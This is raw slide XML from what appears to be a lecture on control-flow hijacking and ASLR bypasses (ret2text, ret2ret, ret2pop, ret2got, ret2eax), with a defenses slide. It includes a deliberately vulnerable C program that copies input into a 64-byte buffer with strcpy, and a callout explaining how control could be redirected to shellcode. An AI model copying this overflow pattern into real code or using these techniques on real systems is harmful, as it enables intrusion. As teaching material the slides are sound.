                <a:t>Attack</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Rectangle 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="487363" y="2330450"/>
              <a:ext cx="1501775" cy="1328738"/>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Brute </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
                <a:t>Force</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Rectangle 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2260600" y="2330450"/>
              <a:ext cx="2120900" cy="1328738"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="595A5A"/>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Non-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
                <a:t>randomized </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
                <a:t>memory</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Rectangle 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4583113" y="2330450"/>
              <a:ext cx="1951037" cy="1328738"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFB03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Stack </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
                <a:t>Juggling</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Oval 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2260600" y="3794125"/>
              <a:ext cx="2120900"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ret2text</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Oval 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2260600" y="4424362"/>
              <a:ext cx="2120900"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err="1"/>
                <a:t>Func</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
                <a:t>ptr</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Oval 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4583113" y="3810000"/>
              <a:ext cx="2120900"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ret2ret</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Oval 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4568825" y="4424363"/>
              <a:ext cx="2120900" cy="604837"/>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ret2pop</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="Rectangle 18"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6765925" y="2330450"/>
              <a:ext cx="1951038" cy="1328738"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFB03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GOT</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
                <a:t>H</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
                <a:t>ijacking</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Oval 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6772275" y="3810000"/>
              <a:ext cx="1944688"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ret2got</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="214452561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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>ret2eax</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1089025" y="1463219"/>
            <a:ext cx="4473575" cy="4708981"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>msglog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>(char *input) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>    char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>[64];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, input);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> main(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>, char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>[]) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>    if(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> != 2) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>exploitme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>&gt;\n");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>        return -1; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>    }   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>msglog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0"/>
              <a:t>[1]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>    return 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rounded Rectangular Callout 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5334000" y="1295400"/>
            <a:ext cx="3048000" cy="1524000"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -107738"/>
              <a:gd name="adj2" fmla="val 17262"/>
              <a:gd name="adj3" fmla="val 16667"/>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nchor="ctr" anchorCtr="1">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>returns pointer to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rounded Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4953000" y="4648199"/>
            <a:ext cx="3733800" cy="184467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noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A subsequent </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>call *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>would redirect control to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3469665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Control Flow Hijack Defenses</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Bugs are the root cause of hijacks!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Find bugs with analysis tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Prove program correctness</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Mitigation Techniques:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Canaries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Data Execution Prevention/No </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eXecute</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Address Space Layout Randomization</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25637755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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>ret2eax</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36866" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Calibri" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Calibri" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="36867" name="Picture 3" descr="ret2eax.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33970" y="1417638"/>
            <a:ext cx="3632200"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Picture 6" descr="Screen shot 2010-03-01 at 1.26.42 P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85326" y="1833238"/>
            <a:ext cx="47371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Rounded Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4106139" y="1833238"/>
            <a:ext cx="769937" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00">
              <a:alpha val="30196"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="20000" dir="5400000" rotWithShape="0">
              <a:srgbClr val="808080">
                <a:alpha val="37999"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Calibri" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="447324" y="3649518"/>
            <a:ext cx="3790044" cy="954107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:alpha val="50000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" spc="-150" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SHELLCODE ……………………...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" spc="-150" dirty="0">
              <a:solidFill>
                <a:srgbClr val="990000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1589416" y="1749245"/>
            <a:ext cx="1549153" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:alpha val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>call *%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="990000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4348851" y="5458361"/>
            <a:ext cx="4473575" cy="1323439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
